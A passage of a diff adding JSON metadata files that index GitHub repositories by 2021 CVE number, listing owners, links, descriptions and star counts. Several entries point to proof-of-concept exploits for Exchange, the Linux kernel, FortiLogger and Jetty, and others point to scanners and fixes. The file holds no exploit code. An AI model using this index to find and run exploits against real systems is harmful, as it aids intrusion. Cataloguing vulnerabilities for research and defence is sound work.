+ "login": "tcbutler320",
+ "id": 41709108,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41709108?v=4",
+ "html_url": "https:\/\/github.com\/tcbutler320"
+ },
+ "html_url": "https:\/\/github.com\/tcbutler320\/CVE-2021-3360",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-04-22T01:17:37Z",
+ "updated_at": "2021-08-20T10:07:52Z",
+ "pushed_at": "2021-04-22T01:38:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-33624.json b/2021/CVE-2021-33624.json
new file mode 100644
index 0000000000..c36156ec1e
--- /dev/null
+++ b/2021/CVE-2021-33624.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 380365358,
+ "name": "CVE-2021-33624",
+ "full_name": "benschlueter\/CVE-2021-33624",
+ "owner": {
+ "login": "benschlueter",
+ "id": 25753058,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25753058?v=4",
+ "html_url": "https:\/\/github.com\/benschlueter"
+ },
+ "html_url": "https:\/\/github.com\/benschlueter\/CVE-2021-33624",
+ "description": "Proof of Concept for CVE-2021-33624",
+ "fork": false,
+ "created_at": "2021-06-25T22:19:38Z",
+ "updated_at": "2022-12-23T17:12:21Z",
+ "pushed_at": "2021-08-02T07:24:02Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-33690.json b/2021/CVE-2021-33690.json
new file mode 100644
index 0000000000..e9295042f4
--- /dev/null
+++ b/2021/CVE-2021-33690.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 648119155,
+ "name": "CVE-2021-33690",
+ "full_name": "redrays-io\/CVE-2021-33690",
+ "owner": {
+ "login": "redrays-io",
+ "id": 89958617,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89958617?v=4",
+ "html_url": "https:\/\/github.com\/redrays-io"
+ },
+ "html_url": "https:\/\/github.com\/redrays-io\/CVE-2021-33690",
+ "description": "[CVE-2021-33690] Server Side Request Forgery vulnerability in SAP NetWeaver Development Infrastructure",
+ "fork": false,
+ "created_at": "2023-06-01T08:49:55Z",
+ "updated_at": "2023-06-01T08:53:09Z",
+ "pushed_at": "2023-06-01T08:54:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-33690",
+ "sap",
+ "ssrf"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-33739.json b/2021/CVE-2021-33739.json
new file mode 100644
index 0000000000..cff8f1e87b
--- /dev/null
+++ b/2021/CVE-2021-33739.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 375334387,
+ "name": "CVE-2021-33739-POC",
+ "full_name": "freeide2017\/CVE-2021-33739-POC",
+ "owner": {
+ "login": "freeide2017",
+ "id": 33774427,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33774427?v=4",
+ "html_url": "https:\/\/github.com\/freeide2017"
+ },
+ "html_url": "https:\/\/github.com\/freeide2017\/CVE-2021-33739-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-06-09T11:40:56Z",
+ "updated_at": "2024-05-20T17:12:28Z",
+ "pushed_at": "2021-06-09T06:58:20Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 56,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 56,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 409820289,
+ "name": "CVE-2021-33739_PoC_Analysis",
+ "full_name": "giwon9977\/CVE-2021-33739_PoC_Analysis",
+ "owner": {
+ "login": "giwon9977",
+ "id": 66773292,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66773292?v=4",
+ "html_url": "https:\/\/github.com\/giwon9977"
+ },
+ "html_url": "https:\/\/github.com\/giwon9977\/CVE-2021-33739_PoC_Analysis",
+ "description": "CVE-2021-33739 PoC Analysis",
+ "fork": false,
+ "created_at": "2021-09-24T03:33:02Z",
+ "updated_at": "2024-05-20T17:12:20Z",
+ "pushed_at": "2021-12-22T09:04:01Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-33766.json b/2021/CVE-2021-33766.json
new file mode 100644
index 0000000000..3bf9dc4f63
--- /dev/null
+++ b/2021/CVE-2021-33766.json
@@ -0,0 +1,71 @@
+[
+ {
+ "id": 401854753,
+ "name": "CVE-2021-33766",
+ "full_name": "bhdresh\/CVE-2021-33766",
+ "owner": {
+ "login": "bhdresh",
+ "id": 8931885,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8931885?v=4",
+ "html_url": "https:\/\/github.com\/bhdresh"
+ },
+ "html_url": "https:\/\/github.com\/bhdresh\/CVE-2021-33766",
+ "description": "ProxyToken (CVE-2021-33766) : An Authentication Bypass in Microsoft Exchange Server POC exploit",
+ "fork": false,
+ "created_at": "2021-08-31T22:03:13Z",
+ "updated_at": "2024-01-13T16:19:16Z",
+ "pushed_at": "2021-10-14T12:32:11Z",
+ "stargazers_count": 48,
+ "watchers_count": 48,
+ "has_discussions": false,
+ "forks_count": 23,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-33766",
+ "exchange",
+ "exchange-server",
+ "exploit",
+ "microsoft",
+ "poc",
+ "proxytoken",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 23,
+ "watchers": 48,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 406689758,
+ "name": "CVE-2021-33766-ProxyToken",
+ "full_name": "demossl\/CVE-2021-33766-ProxyToken",
+ "owner": {
+ "login": "demossl",
+ "id": 29975349,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29975349?v=4",
+ "html_url": "https:\/\/github.com\/demossl"
+ },
+ "html_url": "https:\/\/github.com\/demossl\/CVE-2021-33766-ProxyToken",
+ "description": "CVE-2021-33766-poc",
+ "fork": false,
+ "created_at": "2021-09-15T09:09:20Z",
+ "updated_at": "2023-09-28T11:31:27Z",
+ "pushed_at": "2021-09-15T09:23:39Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3378.json b/2021/CVE-2021-3378.json
new file mode 100644
index 0000000000..457167c8b4
--- /dev/null
+++ b/2021/CVE-2021-3378.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 334535823,
+ "name": "fortilogger_arbitrary_fileupload",
+ "full_name": "erberkan\/fortilogger_arbitrary_fileupload",
+ "owner": {
+ "login": "erberkan",
+ "id": 15521812,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15521812?v=4",
+ "html_url": "https:\/\/github.com\/erberkan"
+ },
+ "html_url": "https:\/\/github.com\/erberkan\/fortilogger_arbitrary_fileupload",
+ "description": "CVE-2021-3378 | FortiLogger - Unauthenticated Arbitrary File Upload (Metasploit)",
+ "fork": false,
+ "created_at": "2021-01-30T23:47:14Z",
+ "updated_at": "2023-12-12T07:37:02Z",
+ "pushed_at": "2021-02-28T16:29:07Z",
+ "stargazers_count": 23,
+ "watchers_count": 23,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 23,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-33831.json b/2021/CVE-2021-33831.json
new file mode 100644
index 0000000000..20701cc14c
--- /dev/null
+++ b/2021/CVE-2021-33831.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 398819708,
+ "name": "CVE-2021-33831",
+ "full_name": "lanmarc77\/CVE-2021-33831",
+ "owner": {
+ "login": "lanmarc77",
+ "id": 3054734,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3054734?v=4",
+ "html_url": "https:\/\/github.com\/lanmarc77"
+ },
+ "html_url": "https:\/\/github.com\/lanmarc77\/CVE-2021-33831",
+ "description": "Exploit example code for CVE-2021-33831",
+ "fork": false,
+ "created_at": "2021-08-22T14:27:29Z",
+ "updated_at": "2021-09-01T08:02:36Z",
+ "pushed_at": "2021-09-01T07:53:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-33879.json b/2021/CVE-2021-33879.json
new file mode 100644
index 0000000000..134f31ce7f
--- /dev/null
+++ b/2021/CVE-2021-33879.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 374430462,
+ "name": "cve-2021-33879",
+ "full_name": "mmiszczyk\/cve-2021-33879",
+ "owner": {
+ "login": "mmiszczyk",
+ "id": 20739931,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20739931?v=4",
+ "html_url": "https:\/\/github.com\/mmiszczyk"
+ },
+ "html_url": "https:\/\/github.com\/mmiszczyk\/cve-2021-33879",
+ "description": "GameLoop update MITM",
+ "fork": false,
+ "created_at": "2021-06-06T18:05:30Z",
+ "updated_at": "2021-06-07T07:48:02Z",
+ "pushed_at": "2021-06-06T18:30:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "advisory",
+ "android-emulator",
+ "cve",
+ "cve-2021-33879",
+ "exploit",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-33909.json b/2021/CVE-2021-33909.json
new file mode 100644
index 0000000000..285ccc2d81
--- /dev/null
+++ b/2021/CVE-2021-33909.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 387988488,
+ "name": "CVE-2021-33909",
+ "full_name": "Liang2580\/CVE-2021-33909",
+ "owner": {
+ "login": "Liang2580",
+ "id": 27684409,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27684409?v=4",
+ "html_url": "https:\/\/github.com\/Liang2580"
+ },
+ "html_url": "https:\/\/github.com\/Liang2580\/CVE-2021-33909",
+ "description": "Sequoia exploit (7\/20\/21)",
+ "fork": false,
+ "created_at": "2021-07-21T04:04:49Z",
+ "updated_at": "2024-05-17T11:27:04Z",
+ "pushed_at": "2021-07-20T23:04:13Z",
+ "stargazers_count": 79,
+ "watchers_count": 79,
+ "has_discussions": false,
+ "forks_count": 64,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 64,
+ "watchers": 79,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 388209239,
+ "name": "cve-2021-33909",
+ "full_name": "baerwolf\/cve-2021-33909",
+ "owner": {
+ "login": "baerwolf",
+ "id": 1092625,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1092625?v=4",
+ "html_url": "https:\/\/github.com\/baerwolf"
+ },
+ "html_url": "https:\/\/github.com\/baerwolf\/cve-2021-33909",
+ "description": "This module fixes an issue in the kernels filesystem layer (CVE-2021-33909) by kprobe-replacing vulnerable functions during runtime",
+ "fork": false,
+ "created_at": "2021-07-21T18:22:55Z",
+ "updated_at": "2023-09-08T18:24:32Z",
+ "pushed_at": "2021-07-25T21:56:30Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 389496562,
+ "name": "CVE-2021-33909",
+ "full_name": "bbinfosec43\/CVE-2021-33909",
+ "owner": {
+ "login": "bbinfosec43",
+ "id": 82197936,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82197936?v=4",
+ "html_url": "https:\/\/github.com\/bbinfosec43"
+ },
+ "html_url": "https:\/\/github.com\/bbinfosec43\/CVE-2021-33909",
+ "description": "Exploit code for CVE-2021-33909,Just a dump of removed https:\/\/github.com\/AmIAHuman\/ repo",
+ "fork": false,
+ "created_at": "2021-07-26T03:24:35Z",
+ "updated_at": "2022-07-12T14:51:35Z",
+ "pushed_at": "2021-07-26T03:29:36Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 402293370,
+ "name": "CVE-2021-33909",
+ "full_name": "ChrisTheCoolHut\/CVE-2021-33909",
+ "owner": {
+ "login": "ChrisTheCoolHut",
+ "id": 10480015,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10480015?v=4",
+ "html_url": "https:\/\/github.com\/ChrisTheCoolHut"
+ },
+ "html_url": "https:\/\/github.com\/ChrisTheCoolHut\/CVE-2021-33909",
+ "description": "CVE-2021-33909 Sequoia",
+ "fork": false,
+ "created_at": "2021-09-02T04:51:54Z",
+ "updated_at": "2023-11-24T02:25:48Z",
+ "pushed_at": "2021-09-02T04:52:19Z",
+ "stargazers_count": 42,
+ "watchers_count": 42,
+ "has_discussions": false,
+ "forks_count": 16,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 16,
+ "watchers": 42,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3395.json b/2021/CVE-2021-3395.json
new file mode 100644
index 0000000000..307f89b433
--- /dev/null
+++ b/2021/CVE-2021-3395.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 335386045,
+ "name": "CVE-2021-3395",
+ "full_name": "jet-pentest\/CVE-2021-3395",
+ "owner": {
+ "login": "jet-pentest",
+ "id": 71512502,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4",
+ "html_url": "https:\/\/github.com\/jet-pentest"
+ },
+ "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2021-3395",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-02T18:31:35Z",
+ "updated_at": "2021-02-14T09:24:05Z",
+ "pushed_at": "2021-02-02T18:38:00Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-33959.json b/2021/CVE-2021-33959.json
new file mode 100644
index 0000000000..d8cca01caf
--- /dev/null
+++ b/2021/CVE-2021-33959.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 589167245,
+ "name": "CVE-2021-33959",
+ "full_name": "lixiang957\/CVE-2021-33959",
+ "owner": {
+ "login": "lixiang957",
+ "id": 34414625,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34414625?v=4",
+ "html_url": "https:\/\/github.com\/lixiang957"
+ },
+ "html_url": "https:\/\/github.com\/lixiang957\/CVE-2021-33959",
+ "description": "CVE-2021-33959",
+ "fork": false,
+ "created_at": "2023-01-15T09:47:48Z",
+ "updated_at": "2023-01-20T07:30:16Z",
+ "pushed_at": "2023-01-15T09:51:57Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34045.json b/2021/CVE-2021-34045.json
new file mode 100644
index 0000000000..95805af0b2
--- /dev/null
+++ b/2021/CVE-2021-34045.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 381879818,
+ "name": "CVE-2021-34045",
+ "full_name": "Al1ex\/CVE-2021-34045",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-34045",
+ "description": "Novel-plus-install-v3.5.3-Druid Unauthorized access",
+ "fork": false,
+ "created_at": "2021-07-01T01:52:49Z",
+ "updated_at": "2023-09-28T11:29:09Z",
+ "pushed_at": "2021-07-01T02:07:39Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438706438,
+ "name": "CVE-2021-34045",
+ "full_name": "kenuosec\/CVE-2021-34045",
+ "owner": {
+ "login": "kenuosec",
+ "id": 77450225,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77450225?v=4",
+ "html_url": "https:\/\/github.com\/kenuosec"
+ },
+ "html_url": "https:\/\/github.com\/kenuosec\/CVE-2021-34045",
+ "description": "druid未授权访问批量扫描poc",
+ "fork": false,
+ "created_at": "2021-12-15T16:56:09Z",
+ "updated_at": "2023-07-25T07:50:05Z",
+ "pushed_at": "2021-12-15T07:37:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34371.json b/2021/CVE-2021-34371.json
new file mode 100644
index 0000000000..aa967d86b6
--- /dev/null
+++ b/2021/CVE-2021-34371.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 403456341,
+ "name": "CVE-2021-34371.jar",
+ "full_name": "zwjjustdoit\/CVE-2021-34371.jar",
+ "owner": {
+ "login": "zwjjustdoit",
+ "id": 50495555,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50495555?v=4",
+ "html_url": "https:\/\/github.com\/zwjjustdoit"
+ },
+ "html_url": "https:\/\/github.com\/zwjjustdoit\/CVE-2021-34371.jar",
+ "description": "CVE-2021-34371.jar",
+ "fork": false,
+ "created_at": "2021-09-06T02:00:52Z",
+ "updated_at": "2023-12-18T05:13:00Z",
+ "pushed_at": "2021-09-06T02:04:15Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3438.json b/2021/CVE-2021-3438.json
new file mode 100644
index 0000000000..8f6b72a3b3
--- /dev/null
+++ b/2021/CVE-2021-3438.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 390295076,
+ "name": "CVE-2021-3438",
+ "full_name": "TobiasS1402\/CVE-2021-3438",
+ "owner": {
+ "login": "TobiasS1402",
+ "id": 46230851,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46230851?v=4",
+ "html_url": "https:\/\/github.com\/TobiasS1402"
+ },
+ "html_url": "https:\/\/github.com\/TobiasS1402\/CVE-2021-3438",
+ "description": "Detection and remediation for CVE-2021-3438 with Powershell",
+ "fork": false,
+ "created_at": "2021-07-28T09:36:42Z",
+ "updated_at": "2021-07-28T14:51:57Z",
+ "pushed_at": "2021-07-28T14:41:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 643688534,
+ "name": "CVE-2021-3438",
+ "full_name": "CrackerCat\/CVE-2021-3438",
+ "owner": {
+ "login": "CrackerCat",
+ "id": 17995064,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4",
+ "html_url": "https:\/\/github.com\/CrackerCat"
+ },
+ "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2021-3438",
+ "description": "A potential buffer overflow in the software drivers for certain HP LaserJet products and Samsung product printers could lead to an escalation of privilege.",
+ "fork": false,
+ "created_at": "2023-05-22T00:00:34Z",
+ "updated_at": "2023-07-14T15:06:05Z",
+ "pushed_at": "2023-05-21T02:58:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3441.json b/2021/CVE-2021-3441.json
new file mode 100644
index 0000000000..d0db32bd0a
--- /dev/null
+++ b/2021/CVE-2021-3441.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 333244615,
+ "name": "CVE-2021-3441-check",
+ "full_name": "tcbutler320\/CVE-2021-3441-check",
+ "owner": {
+ "login": "tcbutler320",
+ "id": 41709108,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41709108?v=4",
+ "html_url": "https:\/\/github.com\/tcbutler320"
+ },
+ "html_url": "https:\/\/github.com\/tcbutler320\/CVE-2021-3441-check",
+ "description": "CVE-2021-3441 CVE Check is a python script to search targets for indicators of compromise to CVE-2021-3441",
+ "fork": false,
+ "created_at": "2021-01-26T23:23:08Z",
+ "updated_at": "2021-08-26T02:09:11Z",
+ "pushed_at": "2021-08-20T09:52:36Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-scanning",
+ "indicators-of-compromise",
+ "ioc"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34428.json b/2021/CVE-2021-34428.json
new file mode 100644
index 0000000000..b48f6f55b6
--- /dev/null
+++ b/2021/CVE-2021-34428.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 712845829,
+ "name": "jetty_9.4.31_CVE-2021-34428",
+ "full_name": "Trinadh465\/jetty_9.4.31_CVE-2021-34428",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/jetty_9.4.31_CVE-2021-34428",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-01T10:15:36Z",
+ "updated_at": "2023-11-01T10:17:17Z",
+ "pushed_at": "2023-11-01T12:01:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34429.json b/2021/CVE-2021-34429.json
new file mode 100644
index 0000000000..7357fc78e4
--- /dev/null
+++ b/2021/CVE-2021-34429.json
@@ -0,0 +1,40 @@
+[
+ {
+ "id": 424157746,
+ "name": "CVE-2021-34429",
+ "full_name": "ColdFusionX\/CVE-2021-34429",
+ "owner": {
+ "login": "ColdFusionX",
+ "id": 8522240,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4",
+ "html_url": "https:\/\/github.com\/ColdFusionX"
+ },
+ "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2021-34429",
+ "description": "POC for CVE-2021-34429 - Eclipse Jetty 11.0.5 Sensitive File Disclosure",
+ "fork": false,
+ "created_at": "2021-11-03T09:13:12Z",
+ "updated_at": "2024-04-18T11:56:36Z",
+ "pushed_at": "2021-11-03T11:51:41Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-34429",
+ "docker",
+ "eclipse",
+ "exploit",
+ "jetty",
+ "path-traversal",
+ "web-xml"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34470.json b/2021/CVE-2021-34470.json
new file mode 100644
index 0000000000..0bc19abd1c
--- /dev/null
+++ b/2021/CVE-2021-34470.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 390877656,
+ "name": "CVE-2021-34470scanner",
+ "full_name": "technion\/CVE-2021-34470scanner",
+ "owner": {
+ "login": "technion",
+ "id": 1948596,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1948596?v=4",
+ "html_url": "https:\/\/github.com\/technion"
+ },
+ "html_url": "https:\/\/github.com\/technion\/CVE-2021-34470scanner",
+ "description": "A Powrshell script to scan for CVE-2021-34470",
+ "fork": false,
+ "created_at": "2021-07-29T23:50:31Z",
+ "updated_at": "2022-08-18T06:30:57Z",
+ "pushed_at": "2021-07-29T23:51:22Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34473.json b/2021/CVE-2021-34473.json
new file mode 100644
index 0000000000..706d8491f2
--- /dev/null
+++ b/2021/CVE-2021-34473.json
@@ -0,0 +1,272 @@
+[
+ {
+ "id": 394695294,
+ "name": "Proxyshell-Scanner",
+ "full_name": "cyberheartmi9\/Proxyshell-Scanner",
+ "owner": {
+ "login": "cyberheartmi9",
+ "id": 12415756,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12415756?v=4",
+ "html_url": "https:\/\/github.com\/cyberheartmi9"
+ },
+ "html_url": "https:\/\/github.com\/cyberheartmi9\/Proxyshell-Scanner",
+ "description": "nuclei scanner for proxyshell ( CVE-2021-34473 )",
+ "fork": false,
+ "created_at": "2021-08-10T15:01:02Z",
+ "updated_at": "2024-04-25T18:58:33Z",
+ "pushed_at": "2022-10-09T20:34:21Z",
+ "stargazers_count": 42,
+ "watchers_count": 42,
+ "has_discussions": false,
+ "forks_count": 15,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 15,
+ "watchers": 42,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 394978827,
+ "name": "CVE-2021-34473-scanner",
+ "full_name": "RaouzRouik\/CVE-2021-34473-scanner",
+ "owner": {
+ "login": "RaouzRouik",
+ "id": 69973378,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69973378?v=4",
+ "html_url": "https:\/\/github.com\/RaouzRouik"
+ },
